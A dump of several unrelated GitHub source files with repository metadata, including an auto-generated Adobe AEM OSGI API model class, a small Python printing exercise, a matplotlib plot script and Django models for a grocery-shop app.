save_decision = input('Do you want to save table to an excel worksheet? (Y/N)' ).upper()
if save_decision == 'Y':
path_decision = input('Do you want to use your current directory {}? (Y/N) '.format(os.getcwd()) ).upper()
if path_decision == 'Y':
save_dir = os.getcwd()
else:
save_dir = input('Please enter the full path of the save location: ')
save_file = input('Please enter a file name (with no extension): ')
try:
datascraper.save_df(final_data_frame, save_dir, save_file)
print('File successfully saved at {}.'.format(save_dir))
except:
print('I don\'t think the file saved, you should double check.')
if __name__ == '__main__':
try:
main(sys.argv[1])
except IndexError as e:
url = input('Please enter url: ' )
main(url)
|
[
"steven.markoe@gmail.com"
] |
steven.markoe@gmail.com
|
29b9da5ced991495507325a3e78188d243514e72
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python/generated/swaggeraemosgi/model/com_adobe_cq_dam_dm_process_image_p_tiff_manager_impl_properties.py
|
7b769282469f192d53feaae0bdaea35623a74394
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092
| 2021-04-09T07:46:03
| 2021-04-09T07:46:03
| 190,217,155
| 3
| 3
|
Apache-2.0
| 2022-10-05T03:26:20
| 2019-06-04T14:23:28
| null |
UTF-8
|
Python
| false
| false
| 6,954
|
py
|
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0-pre.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
import nulltype # noqa: F401
from swaggeraemosgi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from swaggeraemosgi.model.config_node_property_integer import ConfigNodePropertyInteger
globals()['ConfigNodePropertyInteger'] = ConfigNodePropertyInteger
class ComAdobeCqDamDmProcessImagePTiffManagerImplProperties(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'max_memory': (ConfigNodePropertyInteger,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'max_memory': 'maxMemory', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""ComAdobeCqDamDmProcessImagePTiffManagerImplProperties - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
max_memory (ConfigNodePropertyInteger): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
[
"cliffano@gmail.com"
] |
cliffano@gmail.com
|
6e165a1996c2d894f627d732e0e0ba84b908fa90
|
6fe47c363c8339b277e3756e5c6c70a8664cb320
|
/Q12 - SingleLinePrint/SingleLinePrin.py
|
dd26fc4009e5723bd4bb2f148ed7e3f135abb267
|
[] |
no_license
|
aklgupta/pythonPractice
|
e6f3a4092a708c500ac44ec15680b8c5090f3dcd
|
2c08278754f35227c816ababdec5d711e976c172
|
refs/heads/master
| 2021-01-22T09:33:00.981614
| 2018-08-24T10:03:56
| 2018-08-24T10:03:56
| 102,327,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 543
|
py
|
"""Q. 12
Write a Single line Python program that takes two inputs: "String" and "Num".
And then prints the input string given number of times, separated by a single space (Trailing spaces are allowed, but a plus if you remove them as well)
Egs.
Input:
String: A
Num: 5
Output:
A A A A A
Input:
String: ABC
Num: 3
Output:
ABC ABC ABC
Input:
String: A B !
Num: 7
Output:
A B ! A B ! A B ! A B ! A B ! A B ! A B !
"""
print ((raw_input("String: ") + " ") * input("Num: ")).strip()
|
[
"noreply@github.com"
] |
aklgupta.noreply@github.com
|
ec682588230e9c615f3447acb02c2a8b8ad3b94f
|
c0d2347555090a902c099bf24a41aa662315a35b
|
/accumulator.py
|
5e93734234ee771566f72f947154910ceb91b962
|
[] |
no_license
|
VYSHNAVI123/vyshnavi123
|
63d15bba2ab7c95ad5bc1af15c0ab5049da45ff8
|
d76e7780cbf6a8ff6d0e430ef4f0c846b2d4556f
|
refs/heads/master
| 2020-04-19T19:11:53.219277
| 2019-04-21T07:14:30
| 2019-04-21T07:14:30
| 168,382,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
from matplotlib import pyplot as plt
import numpy as np
x=np.arange(0,10,1)
k=1
a=0
l=[]
for i in range(0,10,1):
for j in range(0,k,1):
a=a+1
l.append(a)
plt.stem(x,l)
plt.show()
|
[
"noreply@github.com"
] |
VYSHNAVI123.noreply@github.com
|
5273ad6d41579237ec7873bcd9476e2e67ec49da
|
c3a8a0564ebca0ce66ae51989d62ab0a713944af
|
/爱鲜蜂项目/main_app/models.py
|
c5d125e50e08c435b8defd64e39fbfbc04352edc
|
[] |
no_license
|
happyQiao-PS/Django-
|
858f98a3603c0c75d21fbe02be571b19783e03de
|
ff896fe31a587c89fb0b5077b30caae24fb414dd
|
refs/heads/master
| 2022-11-24T18:19:40.012211
| 2020-04-04T04:23:32
| 2020-04-04T04:23:32
| 238,108,458
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,991
|
py
|
from django.db import models
# Create your models here.
'''
商品表:
商品id(productid) 118826
图片(productimg) http://img01.bqstatic.com/upload/goods/201/701/1916/20170119164119_550363.jpg@200w_200h_90Q
名字(productname) 爱鲜蜂·海南千禧果
长名字(productlongname) 爱鲜蜂·海南千禧果400-450g/盒
是否精选(isxf) 1
是否买一增一(pmdesc) 1
规格(specifics)
价格(price) 13.80
原价(marketprice) 13.8
商品组id(categoryid) 103532
商品子组id(childcid) 103533
商品子组名名称(childcidname) 国产水果
详情页id(dealerid) 4858
库存(storenums) 7
销量(productnum)
'''
class axf_goods(models.Model):
productid = models.IntegerField()
productimg = models.CharField(max_length=256)
productname = models.CharField(max_length=256)
productlongname = models.CharField(max_length=256)
isxf = models.BooleanField(default=True)
pmdesc = models.BooleanField(default=True)
specifics = models.CharField(max_length=128)
price = models.FloatField(default=1.0)
marketprice = models.FloatField(default=1.0)
categoryid = models.IntegerField(default=0)
childcid = models.IntegerField(default=0)
childcidname = models.CharField(max_length=128)
dealerid = models.IntegerField(default=0)
storenums = models.IntegerField(default=0)
productnum = models.IntegerField(default=0)
class Meta:
db_table="axf_goods"
class axf_foodtypes(models.Model):
typeid = models.IntegerField(default=0)
typename = models.CharField(max_length=256)
childtypenames = models.CharField(max_length=256)
typesort = models.IntegerField(default=0)
class Meta:
db_table="axf_foodtypes"
class axf_user(models.Model):
u_username = models.CharField(max_length=128)
u_email = models.CharField(max_length=48,unique=True)
u_password = models.CharField(max_length=128)
u_icon = models.ImageField(upload_to=r"icon/%Y/%m/%d")
u_isactivate = models.BooleanField(default=False)
u_isdelete = models.BooleanField(default=False)
class Meta:
db_table="axf_user"
class axf_shopping_cart(models.Model):
s_good = models.ForeignKey(axf_goods)
s_user = models.ForeignKey(axf_user)
s_num = models.IntegerField(default=0)
s_isChoice = models.BooleanField(default=True)
s_isDelete = models.BooleanField(default=False)
class Meta:
db_table = "axf_shopping_cart"
class axf_order(models.Model):
o_user = models.ForeignKey(axf_user,null=True,on_delete=models.SET_NULL)
o_time = models.DateTimeField(auto_now=True)
o_price = models.FloatField(default=0.0)
o_order_statu = models.IntegerField(default=0)
class Meta:
db_table="axf_order"
class axf_ordergoods(models.Model):
og_goods = models.ForeignKey(axf_goods)
og_order = models.ForeignKey(axf_order)
og_num = models.IntegerField(default=1)
class Meta:
db_table="axf_ordergoods"
|
[
"2945887050@qq.com"
] |
2945887050@qq.com
|
2d80e01da5de1cc702c1b4882e14eb25a8e5528b
|
da2b4c8fc550fc3dd7f5f54fcb1dc61c39b25dc0
|
/string/bestcal.py
|
603331deb0d3d16ae3686ed4de0e3f56c0616937
|
[] |
no_license
|
DecapitatorBond/projects
|
b9b6c1ac147b6cc5d3ccb07fcaa153d084bb2c1e
|
54eabe2279c5ff5869b97548454f91d97230326c
|
refs/heads/master
| 2020-06-07T07:56:19.624500
| 2019-07-23T18:18:45
| 2019-07-23T18:18:45
| 192,967,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
# import newcalc
#
#
#
# m_arg1, m_arg2, m_action = newcalc.input_data()
# try:
# m_arg1, m_arg2, m_action = newcalc.check_data(m_arg1, m_arg2, m_action)
# except newcalc.CalcException as e:
# print(e)
# exit(1)
# newcalc.output_data(m_arg1, m_arg2, m_action)
# from newcalc import input_data
#
# a, b, c = input_date()
# print(a, b, c)
|
[
"xxxzverxxx1998@gmail.com"
] |
xxxzverxxx1998@gmail.com
|
2470feb7e488ffd951c2f385d2f003e8ff627ecd
|
f75f199eff46880efd2f66208db6964a8418a51a
|
/day2/operator_teaching.py
|
fdd61d3cf523111a45b1d3c13fa78d834bf095ac
|
[] |
no_license
|
LeAlpha/PythonNotes
|
75e852ef0f8a40794c2f4fe0a6600fc55d3949c7
|
95ad836d8462e9ac390336638fa43666321f091e
|
refs/heads/master
| 2021-01-01T15:09:12.857948
| 2020-02-11T21:08:57
| 2020-02-11T21:08:57
| 239,331,151
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
# Hvis man gerne vil have et pænt output kan man bruge * (unpacking operator):
numbers = [1, 2, 3, 5]
print(numbers)
print(*numbers)
# De kan bruges til at lave en liste nemt
|
[
"Stephankhader@gmail.com"
] |
Stephankhader@gmail.com
|
f5111aa622c03131b4958d9a881c416a46adb38d
|
bd0f13bf205f453559e8451c91a9f3ce49005312
|
/statistics/statistics.py
|
c491a4efe892f26ee3356498d30e9b6c5992c016
|
[
"MIT"
] |
permissive
|
stevehamwu/EmotionCauseExtraction
|
95c8914d2617fa392af8630e3342bd032f6ed3eb
|
b5a160f35f7b03bf3730b6885096dbc5f958df8b
|
refs/heads/master
| 2021-10-27T05:26:29.463552
| 2019-04-16T07:04:00
| 2019-04-16T07:04:00
| 178,976,046
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/12/14 22:09
# @Author : Steve Wu
# @Site :
# @File : statistics.py
# @Software: PyCharm
# @Github : https://github.com/stevehamwu
from abc import ABCMeta, abstractmethod
from utils.app.log import Logger
class Statistics:
__metaclass__ = ABCMeta
def __init__(self):
self.logger = Logger.get_instance()
@abstractmethod
def __call__(self, datasets, all_probs, model_path, epoch):
"""
"""
pass
|
[
"stevehamwu@gmail.com"
] |
stevehamwu@gmail.com
|
3b535ecb1b332a1552b481f59c771def9df427c9
|
b3d2ec5b71718c19f4946b6dddfdf2f85c8888dc
|
/Leetcode/151~200/L169 求众数.py
|
373851728662a0cf2208aca53d802a849977c218
|
[] |
no_license
|
Mr-ZDS/Python_Brid
|
188b90f0803b5738d3cf4eb07a529c9afc093c2c
|
3c67f5fdd98c4424a19c2dc01e6bc4b6acebb1dd
|
refs/heads/master
| 2020-04-29T10:26:23.579411
| 2019-08-20T08:38:19
| 2019-08-20T08:38:19
| 176,062,095
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
class Solution:
def majorityElement(self, nums: List[int]) -> int:
count, result = 0, nums[0]
for i in nums[1:]:
if i == result:
count += 1
elif count > 0:
count -= 1
else:
result = i
return result
|
[
"zhdashuai@foxmail.com"
] |
zhdashuai@foxmail.com
|
49d3abd9fddb6b20f419bffd5990a35d1df62348
|
25d47540ff7bbc6d48d7908473b3e7e507962f83
|
/Python_Primer/Iris.py
|
1ea65dc3f80f289593ad7ee0b8f2d2f12728735e
|
[] |
no_license
|
nuonuozi/Python-
|
993319eca806ee8b81933b2103842dbf8c947a75
|
5b90c471af53d366f4749d676c8cd929de4f857a
|
refs/heads/master
| 2022-04-06T17:01:23.947639
| 2019-01-20T07:14:48
| 2019-01-20T07:14:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,255
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 18 09:41:46 2018
@author: asus
"""
#导入iris数据加载器
from sklearn.datasets import load_iris
#使用加载器读取数据并存入变量iris
iris=load_iris()
#查验数据规模
#print(iris.data.shape)
#查看数据说明
#print(iris.DESCR)
#对数据进行随机分割
from sklearn.cross_validation import train_test_split
X_train,X_test,y_train,y_test=train_test_split(iris.data,iris.target,test_size=0.25,random_state=33)
#使用K近邻分类器对数据进行类别预测
#导入标准化模块
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
#对训练数据的测试的特征数据进行标准化
ss=StandardScaler()
X_train=ss.fit_transform(X_train)
X_test=ss.transform(X_test)
#使用K近邻分类器对测试数据进行类别预测,预测结果保存在y_predict中
knc=KNeighborsClassifier()
knc.fit(X_train,y_train)
y_predict=knc.predict(X_test)
#对K近邻分类器数据的预测性能进行评估
print('The accuracy of K-Nearest Neighbor Classifier is',knc.score(X_test,y_test))
#详情分析
from sklearn.metrics import classification_report
print(classification_report(y_test,y_predict,target_names=iris.target_names))
|
[
"3255893782@qq.com"
] |
3255893782@qq.com
|
01a81e0c71bd42b48a2930aa0688a421ceabef9d
|
d2d4e2dbefe82d33c81d7b1d96b1bb269f41198e
|
/DjangoTestApp/asgi.py
|
f1198a37260487e212c2df80790e244505c69d33
|
[] |
no_license
|
Saitama0811/django-blog-app
|
9a31783048267140a57e71b3d2f07d0fa2aee9c5
|
58387988c4988694acea9bed3c32443a05212a2f
|
refs/heads/main
| 2023-01-01T16:10:55.555627
| 2020-10-20T15:16:44
| 2020-10-20T15:16:44
| 305,743,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
ASGI config for DjangoTestApp project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjangoTestApp.settings')
application = get_asgi_application()
|
[
"goel.123.saurabh@gmail.com"
] |
goel.123.saurabh@gmail.com
|
90ccd4ffffa9e98eb7765b90450e987e78d04300
|
3f9a6d4e12fe5ccdd5913553e2e726cbdf702431
|
/Lab03/exercise6_1_2.py
|
1616e569661ba0832b6956ec897499c5be1f2ed6
|
[] |
no_license
|
xingengwang/transportation_Network
|
278c5b13f61a62d1f9da73217500c97cceed80b6
|
06fc2e5299d235399f1a1bdaf90a7d6726ed68c3
|
refs/heads/master
| 2021-01-11T18:08:35.749196
| 2017-03-18T19:20:21
| 2017-03-18T19:20:21
| 79,502,467
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,269
|
py
|
'''
xingeng wang
11144515
xiw031
'''
TCPPacket = input("Please type the TCP Packet String: ")
TCPPacketLength = 4*len(TCPPacket)
TCPPacketBin = bin(int(TCPPacket,16))[2:].zfill(TCPPacketLength)
TCPPacketDict ={}
TCPPacketDict['SRC. PORT ADDR. (16 BITS)'] = int(TCPPacketBin[0:16],2)
TCPPacketDict['DST. PORT ADDR. (16 BITS)'] = int(TCPPacketBin[16:32],2)
TCPPacketDict['SEQUENCE NO. (32 BITS)'] = int(TCPPacketBin[32:64],2)
TCPPacketDict['ACKNOWLEDGMENT NO. (32 BITS)'] = int(TCPPacketBin[64:96],2)
TCPPacketDict['HLEN (4 BITS)'] = int(TCPPacketBin[96:100],2)
TCPPacketDict['RESERVED (6 BITS)'] = int(TCPPacketBin[100:106],2)
TCPPacketDict['URG'] = int(TCPPacketBin[106],2)
TCPPacketDict['ACK'] = int(TCPPacketBin[107],2)
TCPPacketDict['PSH'] = int(TCPPacketBin[108],2)
TCPPacketDict['RST'] = int(TCPPacketBin[109],2)
TCPPacketDict['SYN'] = int(TCPPacketBin[110],2)
TCPPacketDict['FIN'] = int(TCPPacketBin[111],2)
TCPPacketDict['WINDOW SIZE (16 BITS)'] = int(TCPPacketBin[112:128],2)
TCPPacketDict['CHECKSUM (16 BITS)'] = int(TCPPacketBin[128:144],2)
TCPPacketDict['URGENT POINTER (16 BITS)'] = int(TCPPacketBin[144:160],2)
if (TCPPacketLength>480):
TCPPacketDict['DATA (16 BITS)'] = int(TCPPacketBin[480:],2)
if (TCPPacketLength>160):
TCPPacketDict['OPTION AND PADDING (UP TO 40 BYTES)'] = int(TCPPacketBin[160:480],2)
if ((TCPPacketLength>160) and (TCPPacketLength<=480)):
TCPPacketDict['OPTION AND PADDING (UP TO 40 BYTES)'] = int(TCPPacketBin[160:],2)
fd = open('TCPPacket.html','w')
html_content = []
html_content.append("<!DOCTYPE html>\n<html>\n<head>\n<style>\ntable, th, td \n{ \n border: 1px solid black; \n border-collapse: collapse; \n}\n ")
html_content.append("th, td \n{\npadding: 5px;\ntext-align: center;\n}\n</style>\n</head>\n<body>\n")
html_content.append("<table " + 'style="width:100%"'+ ">\n")
for keys in TCPPacketDict:
html_content.append("<tr>\n")
html_content.append("<th>")
html_content.append(str(keys))
html_content.append("</th>\n")
html_content.append("<td>")
html_content.append(str(TCPPacketDict[str(keys)]))
html_content.append("</td>\n")
html_content.append("</tr>\n")
html_content.append("</table>\n\n")
html_content.append("</body>\n</html>")
s = "".join(html_content)
fd.write(s)
fd.close()
|
[
"xingengwang@gmail.com"
] |
xingengwang@gmail.com
|
a68b49e307aabca75afa62efbf275e2565c23f41
|
e0c6058dfcb9f0ffe4513f40c04587a6d3f19491
|
/src/search_query.py
|
7f9425e1cf6c44a990259fb97b9493ca0077bc09
|
[
"MIT"
] |
permissive
|
islamariya/SQLAlchemy_blog_model
|
e4a859430aeb343592d207ff75f2c69f2314df74
|
6ad13d20fea3bcce781f6c1c6158d8581a6fdf03
|
refs/heads/master
| 2020-12-18T11:31:16.041456
| 2020-01-21T15:05:00
| 2020-01-21T15:05:00
| 235,364,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,606
|
py
|
"""This module """
from sqlalchemy import func
from sqlalchemy.exc import OperationalError
from DatabaseModels import User, Posts, tag_posts_relation
from db_operations import create_db_connection
from logs import logging
def get_user_posts(session, username, tags_qt):
"""This func loads from DB posts of particular user which have at least tags_qt tags.
:param session:
:param username: string, User, whose posts you want to get
:param tags_qt: int, min qt of tags post should have to be selected
:return list of tuples (post_id, Post title, post's tags number)
"""
is_user_exist = session.query(User.user_name).filter(User.user_name == username).first()
if is_user_exist:
posts_found = session.query(Posts, func.count(tag_posts_relation.c.post_id).label("TagsNum")
).join(tag_posts_relation, User).group_by(Posts).filter(User.user_name == username
).having(
func.count(tag_posts_relation.c.post_id) >= tags_qt).all()
return posts_found
else:
print(f"Пользователя {username} в БД нет")
def print_results(posts_found, username, tags_qt):
"""This function prints the search results in console
:param my_query: list of results found get_user_posts
:param username: string, User, whose posts you want to get
:param tags_qt: int, min qt of tags post should have to be selected
"""
successful_message = f"У пользователя {username} найдено {len(posts_found)} постов с {tags_qt} тегами и больше \n" \
f"Список постов и кол-во тегов:"
zero_result_found_message = f"Постов с {tags_qt} тегами у пользователя {username} не найдено."
message_to_print = successful_message if len(posts_found) > 0 else zero_result_found_message
print(message_to_print)
for result in posts_found:
print(result)
if __name__ == "__main__":
session = create_db_connection()
username = "Alise"
tags_qt = 5
try:
posts_found = get_user_posts(session, username, tags_qt)
print_results(posts_found, username, tags_qt)
except TypeError:
logging.exception("TypeError")
print("Ничего не найдено")
except OperationalError:
logging.exception("OperationalError")
print(f"БД сйчас недоступна")
|
[
"noreply@github.com"
] |
islamariya.noreply@github.com
|
a6884354d282244a4a813c04d18cc5a0438e47fb
|
26a0f3a7338acc9ccc9a0b792dd96125ca6768cd
|
/tensor_2.0/Mean_Squared_Error.py
|
9632cb5e179c2b174227b48a92cb8eac4fa697b2
|
[] |
no_license
|
mildsalmon/AI
|
dc6b04b0087d20ae4fbbe2e633eaf0c34ee2dd4f
|
d0ce6911fd05ca3b66018cc170d16c6575924a33
|
refs/heads/master
| 2023-02-11T17:51:37.659955
| 2021-01-12T12:45:00
| 2021-01-12T12:45:00
| 281,025,489
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 581
|
py
|
import numpy as np
fake_a_b = [3, 76]
data = [[2, 81], [4, 93], [6, 91], [8, 97]]
x = [i[0] for i in data]
y = [i[1] for i in data]
def predict(x):
return fake_a_b[0]*x + fake_a_b[1]
def mse(y, y_hat):
return ((y-y_hat) ** 2).mean()
def mse_val(y, predict_result):
return mse(np.array(y), np.array(predict_result))
predict_result = []
for i in range(len(x)):
predict_result.append(predict(x[i]))
print("공부시간={0}, 실제 점수={1}, 예측 점수={2}".format(x[i], y[i], predict(x[i])))
print("mse 최종값: " + str(mse_val(predict_result, y)))
|
[
"mildsalmon@gmail.com"
] |
mildsalmon@gmail.com
|
ba3beb43a9252d7603decdc7295f28feed347ec6
|
321595b04de9bf1def15f12351a36f271b18d7ce
|
/checkpathsum.py
|
cd389846f30348d2ed3be7906a10c846d9a2203c
|
[] |
no_license
|
yashkantharia/random-codes
|
e199162b2b55295bdcb8aa744a82fd2ca1856fcd
|
4ee18a0dcddd7f6e650e1a14c63d2db51e489113
|
refs/heads/master
| 2020-04-22T01:06:41.100619
| 2019-02-10T17:21:31
| 2019-02-10T17:21:31
| 170,003,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
#create a constructor for tree
class node:
def __init__(self, data =None):
self.data = data
self.left = None
self.right = None
#make a tree like the example tree given below
# 1
# / \
# 2 3
# / \ / \
# 4 5 6 7
root = node(1)
root.left = node(2)
root.right = node(3)
root.left.left = node(4)
root.left.right = node(5)
root.right.left = node(6)
root.right.right = node(7)
print("Enter a number to check with path sum:")
n = int(input())
s=0
#list to contain the path sums
ans=[]
#function to check path sum
# recursively call to check each path
def pathsum(node,s):
if node is None:
print("Empty tree")
else:
s = s + node.data
if node.left is not None:
pathsum(node.left,s)
if node.right is not None:
pathsum(node.right,s)
if node.left is not None and node.right is not None:
s = 0
if s!=0:
ans.append(s)
#call pathsum fucntion to check if the input is equal to any path sum of tree
pathsum(root,s)
if n in ans:
print(True)
else:
print(False)
"""
Output for correct input:
Enter a number to check with path sum:
7
True
Output for incorrect input:
Enter a number to check with path sum:
13
False
"""
|
[
"noreply@github.com"
] |
yashkantharia.noreply@github.com
|
1e896a3e1dd3d8100732c80806419a4517e7da8a
|
663c108dca9c4a30b7dfdc825a8f147ba873da52
|
/venv/tuple/15Packing.py
|
10387419da3a2d58be9a9255e71ee07e4b029004
|
[] |
no_license
|
ksrntheja/08-Python-Core
|
54c5a1e6e42548c10914f747ef64e61335e5f428
|
b5fe25eead8a0fcbab0757b118d15eba09b891ba
|
refs/heads/master
| 2022-10-02T04:11:07.845269
| 2020-06-02T15:23:18
| 2020-06-02T15:23:18
| 261,644,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 167
|
py
|
a = 10
b = 20
c = 30
d = 40
t = a, b, c, d
print(t, type(t))
l = [a, b, c, d]
print(l, type(l))
# (10, 20, 30, 40) <class 'tuple'>
# [10, 20, 30, 40] <class 'list'>
|
[
"srntkolla@gmail.com"
] |
srntkolla@gmail.com
|
40a0a59fd8a5da590b1c6cc161235daab309d51b
|
859368aa97ed48f6d8a4f5e87e266fc6bc82fc40
|
/examples/python/sendmore.py
|
213eafb1cb7dc9a1f0c02cc35f363ac9c4b6e2d8
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
simonlynen/or-tools
|
d93cac78ff7bb56643fea03a0c8ddac141e34f8d
|
dde4ed7e1d1996d70657ca106c9d8ca81e138f65
|
refs/heads/master
| 2020-12-11T02:14:58.849479
| 2015-07-22T12:57:01
| 2015-07-22T12:57:01
| 39,518,091
| 1
| 1
| null | 2015-07-22T16:47:22
| 2015-07-22T16:47:22
| null |
UTF-8
|
Python
| false
| false
| 1,840
|
py
|
# Copyright 2010-2014 Google
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Send + more = money.
In this model, we try to solve the following cryptarythm
SEND + MORE = MONEY
Each letter corresponds to one figure and all letters have different values.
"""
from google.apputils import app
import gflags
from ortools.constraint_solver import pywrapcp
FLAGS = gflags.FLAGS
def main(unused_argv):
# Create the solver.
solver = pywrapcp.Solver('SEND + MORE = MONEY')
digits = range(0, 10)
s = solver.IntVar(digits, 's')
e = solver.IntVar(digits, 'e')
n = solver.IntVar(digits, 'n')
d = solver.IntVar(digits, 'd')
m = solver.IntVar(digits, 'm')
o = solver.IntVar(digits, 'o')
r = solver.IntVar(digits, 'r')
y = solver.IntVar(digits, 'y')
letters = [s, e, n, d, m, o, r, y]
solver.Add(
1000 * s + 100 * e + 10 * n + d +
1000 * m + 100 * o + 10 * r + e ==
10000 * m + 1000 * o + 100 * n + 10 * e + y)
# pylint: disable=g-explicit-bool-comparison
solver.Add(s != 0)
solver.Add(m != 0)
solver.Add(solver.AllDifferent(letters))
solver.NewSearch(solver.Phase(letters,
solver.INT_VAR_DEFAULT,
solver.INT_VALUE_DEFAULT))
solver.NextSolution()
print letters
solver.EndSearch()
if __name__ == '__main__':
app.run()
|
[
"lperron@google.com@59fed7e4-672f-1a80-1451-5ac2ff6d83f1"
] |
lperron@google.com@59fed7e4-672f-1a80-1451-5ac2ff6d83f1
|
3a9e9633406dc732d998cf457a907e6d099b412a
|
0a7a5fb8a66d7b71df0ed04bd2c23d1599cd1b59
|
/api/migrations/0012_employee_performance_review.py
|
8040b7869612e4af4ac6adbb7369b6b0ac951d84
|
[] |
no_license
|
hanq08/EmployeeAPI
|
05212a99d156e4ed553d5a7f6c45c12e1cad0d89
|
d0ac1b4b4c513fbecd706b0c1136c569e9b5e6f1
|
refs/heads/master
| 2021-01-16T00:42:55.124879
| 2017-08-11T16:19:34
| 2017-08-11T16:19:34
| 99,975,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 607
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-10 15:33
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0011_remove_employee_performance_review'),
]
operations = [
migrations.AddField(
model_name='employee',
name='performance_review',
field=models.IntegerField(default=3, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)]),
),
]
|
[
"tqhan317@gmail.com"
] |
tqhan317@gmail.com
|
295c9120d6d7eca5a2c916ae12196fac0cdc2e59
|
8d8dd2a5c490e912f957f4afe9d6d02da673805c
|
